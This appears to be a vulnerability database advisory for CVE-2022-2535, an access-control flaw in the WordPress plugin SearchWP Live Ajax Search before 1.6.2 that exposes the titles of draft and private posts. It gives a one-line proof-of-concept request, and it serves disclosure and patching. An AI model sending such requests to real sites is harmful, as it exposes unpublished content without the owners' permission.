SearchWP Live Ajax Search < 1.6.2 – Unauthenticated Arbitrary Post Title Disclosure | CVE 2022-2535

Description

The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink

Proof of Concept

http://example.com/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft

Affects Plugins

searchwp-live-ajax-search

Fixed in 1.6.2

References

CVE

CVE-2022-2535

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CWE-639

CVSS

5.3 (medium)

Miscellaneous

Original Researcher

Angelo Delicato

Submitter

Angelo Delicato

Submitter website

https://secsi.io

Submitter twitter

thelicato

Verified

Yes

WPVDB ID

0e13c375-044c-4c2e-ab8e-48cb89d90d02

Timeline

Publicly Published

2022-07-25 (about 3 years ago)

Added

2022-07-25 (about 3 years ago)

Last Updated

2022-08-25 (about 3 years ago)

Other

Published

Title

Published

2024-06-28

Title

Page and Post Clone < 6.1 - Insecure Direct Object Reference to Authenticated (Author+) Sensitive Information Exposure

Published

2025-04-11

Title

User Registration & Membership – Custom Registration Form, Login Form, and User Profile < 4.1.4 - Insecure Direct Object Reference to Unauthenticated Membership Modification

Published

2024-04-15

Title

Published

2021-07-27

Title

uListing < 2.0.6 - Authenticated IDOR

Published

2024-07-18

Title

GiveWP – Donation Plugin and Fundraising Platform < 3.14.0 - Insecure Direct Object Reference to Authenticated (GiveWP Worker+) Arbitrary Post Actions